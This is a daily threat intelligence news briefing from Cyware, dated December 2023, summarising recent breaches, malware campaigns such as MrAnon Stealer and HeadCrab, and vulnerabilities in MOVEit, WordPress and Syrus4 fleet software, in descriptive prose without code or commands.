We use cookies to improve your experience. Do you accept?

Cyware Daily Threat Intelligence

Cyware Daily Threat Intelligence - Featured Image

Daily Threat Briefing Dec 8, 2023

Microsoft Windows users are being warned of MrAnon Stealer camouflaged via fake hotel booking alerts. The attack primarily targets Germany, with a surge in activity observed in November 2023. Parallely, threats due to automation in the logistics sector call for robust security measures. Recently, a bug found in fleet management software raised fresh concerns about the safety of individuals. The exploitation of the flaw may lead to the compromise of backend infrastructure, potentially impacting thousands of vehicles at the same time.

What more? Progress Software, the provider of the MOVEit file-transfer service, revealed two new high-severity vulnerabilities, bringing the total CVE count to eight since a zero-day exploit in May. Meanwhile, cyber agencies released a warning against Star Blizzard, a Russian APT threat, making a comeback.

Top Breaches Reported in the Last 24 Hours

Star Blizzard targets U.S. and U.K

The CISA and other Western law enforcement agencies have alerted of a Russian cyber-espionage group named Star Blizzard, linked to the FSB. The group has been observed targeting sectors in the U.S. and the U.K, with malicious activities also noted in other NATO countries and neighboring Russia. Star Blizzard has expanded its focus to include defense-industrial targets and U.S. DoE facilities. The group employs surgical spear-phishing attacks, sending emails to personal addresses to circumvent security controls in corporate networks.

Akira ransomware Group claims two victims

The Akira ransomware group added two new victims—Compass Group Italia, an Italian-based company, and Aqualectra Utility, a government-owned utility provider in Curacao—to its list. The threat actor posted claims on a dark web forum, asserting that 107GB of sensitive data was obtained from Compass Group Italia and that Aqualectra Utility's operational files, business documents, and payment records were compromised.

Android app leaks sensitive data

The Barcode to Sheet Android app was found leaking sensitive user information and enterprise data. The Cybernews team discovered that the app developers left their Firebase database open, exposing over 368MB of data. The exposed data included enterprise information stored in plaintext, user passwords in MD5 hash format, and various application secrets and access keys. Access to such information could open a gateway to phishing attacks, credential stuffing, and other malicious activities.

Top Malware Reported in the Last 24 Hours

Phishing campaign deploys MrAnon Stealer

FortiGuard Labs uncovered a sophisticated phishing campaign employing deceptive hotel booking information to lure victims into downloading a malicious PDF file. The PDF, when opened, initiates the download of a .NET executable file created with PowerGUI, which then runs a PowerShell script to fetch and execute the final malware, known as MrAnon Stealer. This Python-based information stealer is compressed with cx-Freeze to avoid detection. It is capable of stealing victims' credentials, system information, browser sessions, and cryptocurrency extension data.

HeadCrab malware resurfaces with new variant

Aqua Security researchers have identified a second variant of the HeadCrab malware, known for building botnets used in cryptomining and other cyberattacks. This variant has infected 1,100 Redis servers. While not a traditional rootkit, this variant allows control over functions and responses, enabling the malware to become practically invisible by modifying responses. The update includes minor changes, such as the removal of custom commands and encryption added to the command and control infrastructure.

Top Vulnerabilities Reported in the Last 24 Hours

Severe bug found in fleet management software

A sensitive security vulnerability affecting the Syrus4 IoT gateway, made for use in fleet management by Digital Communications Technologies (DCT), enables hackers to manipulate and potentially shut down vehicles at scale, discovered Yashin Mehaboobe, a security consultant at Xebia. The flaw, CVE-2023-6248, allows unauthorized access to the software, providing control over live locations, engine diagnostics, speakers, airbags, and the ability to execute arbitrary code on thousands of vehicles. The issue was initially reported to the vendor in April.

Two new high-severity MOVEit flaws spotted

Progress Software has disclosed two new high-severity vulnerabilities in its MOVEit file-transfer service. The vulnerabilities include a privilege escalation path (CVE-2023-6218) and a cross-site scripting flaw (CVE-2023-6217). These additions bring the total number of CVEs in MOVEit to eight since a zero-day vulnerability (CVE-2023-34362) was exploited by the Clop ransomware group in late May. Progress Software stated that there is no evidence of active exploitation of the latest vulnerabilities as of now.

WordPress addresses RCE bug

The WordPress team released version 6.4.2 to address a critical RCE vulnerability found in WordPress core 6.4. The Property Oriented Programming (POP) chain vulnerability could allow arbitrary PHP code execution under specific conditions, requiring an attacker to control all properties of a deserialized object. This flaw, not directly exploitable in the core, becomes more severe when combined with certain plugins, especially in multisite installations.

Related Threat Briefings